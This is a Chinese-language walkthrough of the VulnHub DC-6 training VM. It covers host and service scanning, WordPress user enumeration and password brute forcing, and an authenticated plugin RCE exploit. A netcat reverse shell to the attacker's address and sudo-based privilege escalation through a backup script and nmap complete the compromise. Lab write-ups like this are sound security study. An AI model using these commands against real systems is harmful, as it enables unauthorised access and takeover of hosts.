vulnhub-DC-6

news/发布时间2024/5/23 20:04:40

🖳 主机发现

sudo netdiscover -i eth0 -r 192.168.1.0/24Currently scanning: Finished!   |   Screen View: Unique Hosts                                     21 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 1260                                 _____________________________________________________________________________IP            At MAC Address     Count     Len  MAC Vendor / Hostname      -----------------------------------------------------------------------------192.168.1.1     28:c8:7c:19:bf:e8     13     780  zte corporation                                 192.168.1.5     20:1e:88:ad:fc:55      1      60  Intel Corporate                                 192.168.1.4     c4:e1:a1:cf:47:95      4     240  GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,L192.168.1.6     0c:d8:6c:a5:e7:a1      1      60  SHENZHEN FAST TECHNOLOGIES CO.,LTD              192.168.1.14    08:00:27:e2:b6:88      1      60  PCS Systemtechnik GmbH                          192.168.1.3     a2:86:90:e6:04:98      1      60  Unknown vendor

目标是192.168.1.14

👁 服务扫描

# Nmap 7.94SVN scan initiated Fri Feb 16 15:50:20 2024 as: nmap -p- -oN nmap_scan -sV -sC --min-rate 5000 192.168.1.14
Nmap scan report for 192.168.1.14 (192.168.1.14)
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 08:00:27:E2:B6:88 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 16 15:50:28 2024 -- 1 IP address (1 host up) scanned in 8.69 seconds

发现重定向到http://wordy/这个网站,我们把它加入hosts文件中
发现主页是一个wordpress网站,对其进行扫描

wpscan -e vt,vp,u --url http://wordy/
[+] admin| Found By: Rss Generator (Passive Detection)| Confirmed By:|  Wp Json Api (Aggressive Detection)|   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)|  Login Error Messages (Aggressive Detection)[+] graham| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] sarah| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] jens| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] mark| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)

发现了很多用户,记录下来,然后尝试一下登录界面的弱口令,没有试出弱口令,那就尝试爆破,因为爆破路径也没有什么有趣的,那攻击向量只有web喝ssh,web又只有这个登录页面是暴露的。
根据作者的提示,生成一下密码字典

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

尝试爆破

wpscan --url http://wordy -U users -P passwords.txt

得到了凭证

mark:helpdesk01

🚪🚶 获取权限

登录上之后,发现有一个Activity Monitor,搜索一下有没有漏洞

searchsploit Activity
···
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection                                                | php/webapps/45274.html
WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)                                  | php/webapps/50110.py
···

我们使用下面那个,执行之后输入ip,username,password,然后用nc反弹shell。

nc -e /bin/bash 192.168.1.13 443

🛡️ 提升权限

用linpeas.sh辅助提权脚本枚举信息

这里有俩个有趣的文件,我们可以在things-to-do.txt中发现用户gaham的凭证

我们用ssh登录上去,后进行一些枚举,发现可以以jens身份运行backups.sh脚本,且因为gaham用户是devs组,对该脚本有修改权限,我们可以在里面加一个/bin/bash来启动一个jens用户的shell

sudo -u jens ./backups.sh

或者jens的shell后,再次使用sudo -l进行检查

然后在GTFOBins搜索nmap
https://gtfobins.github.io/gtfobins/nmap/#sudo
最终拿到root的shell

📖 推荐文章

DC-6下载地址
DC-6国外大佬walkthrough文章
GTFOBins地址
个人博客地址

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.jwkm.cn/p/73663724.html

如若内容造成侵权/违法违规/事实不符,请联系宁远站长网进行投诉反馈email:xxxxxxxx@qq.com,一经查实,立即删除!

相关文章

第二十三天:MYSQL集群Cluster

一、MySQL 主从复制1、主从复制架构和原理 读写分离 复制:每个节点都有相同的数据集,向外扩展,基于二进制日志的单向复制 2、复制架构 (1)一主一从复制架构 (2)一主多从复制架构3、主从复制原理主从复制相关线程 主节点: dump Thread:为每个Slave的I/O Thread启动一个…

动态规划-DP 完整版

动态规划 学完了五大基础dp 做个简单总结dp特征动态规划问题 首要是找到做题的目的 是求最大/小值 还是其他; 其二 要确定问题的状态转移方程 这是关键; 第三 为dp数组找到边界、 最后 检查是否需要结合其他相关知识 如树 dfs等; 别忘了检查多测输入 数组变量置零等易错点。…

DVWA-Insecure CAPTCHA(不安全的验证码)

Insecure CAPTCHA 意思是不安全的验证码,指验证在验证过程中,存在逻辑漏洞,导致可以绕过验证。CAPTCHA全称为:Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)。 DVWA-Insecure CAPTCHA级别:--low--medi…

VSCOde+Nodejs+Typescript前端开发环境

1.安装Node.js 下载地址:https://nodejs.org/en lts版本: 长久稳定版本 安装:默认安装就可以了 验证:node2.VSCode 下载地址:https://code.visualstudio.com/Download 安装:默认安装 语言切换: 安装中文插件,重启3.支持TypeScript TypeScript是JavaScript的超集,强制进…

读十堂极简人工智能课笔记04_计算机视觉

计算机视觉1. 仙女蜂 1.1. Megaphragma mymaripenne 1.2. 一种微小的蜂类 1.3. 人类已知第三小的昆虫 1.4. 大脑仅由7400个神经元组成,比大型昆虫的大脑小了好几个数量级 1.5. 微小的身体里没有空间容纳这些神经元,所以在生长的最后阶段,它把每个神经元内最重要的细胞核剥离…